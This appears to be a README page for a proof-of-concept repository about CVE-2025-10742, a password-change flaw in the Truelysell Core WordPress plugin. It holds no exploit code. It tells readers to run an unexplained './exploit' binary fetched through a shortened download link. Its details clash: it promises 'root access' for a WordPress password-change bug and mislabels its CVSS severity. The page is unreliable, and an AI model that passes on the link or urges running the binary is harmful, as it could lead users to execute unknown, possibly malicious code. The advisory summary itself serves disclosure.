
CVE-2025-10742 PoC — Truelysell Core <= 1.8.6 - Unauthenticated Arbitrary User Password Change

Associated Vulnerability
Title: Truelysell Core <= 1.8.6 - Unauthenticated Arbitrary User Password Change (CVE-2025-10742)
Description: The Truelysell Core plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.8.6. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note: This can only be exploited unauthenticated if the attacker knows which page contains the 'truelysell_edit_staff' shortcode.
Readme
# CVE-2025-10742

## Overview

The Truelysell Core plugin for WordPress contains a security flaw that allows unauthorized users to change the passwords of existing accounts.

## Vulnerability Details

This vulnerability arises from insufficient access controls, enabling attackers to exploit the 'truelysell_edit_staff' shortcode without authentication. Consequently, unauthenticated individuals can manipulate user passwords, which poses a significant risk of unauthorized account access, including the potential compromise of administrator privileges. Website owners using affected plugin versions are urged to implement security measures and update to the latest version to safeguard their systems.

### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low

Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.

### Important Note

Use this exploit responsibly and only on systems you own or have explicit permission to test.

## Example

Here is a simple example of how to use the exploit:

1. Open your terminal.
2. Run the exploit:

   ```bash
   ./exploit
   ```

3. If successful, you will see a message indicating that you have gained root access.

### Download [here](https://tinyurl.com/2w2ktfmd)
File Snapshot

[4.0K] /data/pocs/8dc9f2f2485c475073d6cc26c5020e86187545c5
└── [1.4K] README.md

1 directory, 1 file